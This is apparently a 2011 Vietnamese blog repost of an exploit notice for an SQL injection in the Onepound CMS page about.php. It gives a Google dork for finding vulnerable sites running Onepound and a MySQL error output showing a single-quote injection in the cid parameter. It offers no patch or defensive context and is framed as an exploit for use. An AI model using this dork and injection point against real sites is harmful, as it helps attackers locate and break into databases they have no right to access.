X - No Smoking - X

Exploit : Onepound(about.php) sql injection Vulnerability

Posted by Wuiluc On Thứ Tư, 20 tháng 7, 2011 0 nhận xét
# Category:: webapps

# Tested on: Linux Back Track 5

# Google dork:intitle:intext:"Powered by Onepound." inurl:about.php?cid=

Bug :
errorYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

sql=select ID,ParentID from promenu where ID=9\'

0 nhận xét:

Đăng nhận xét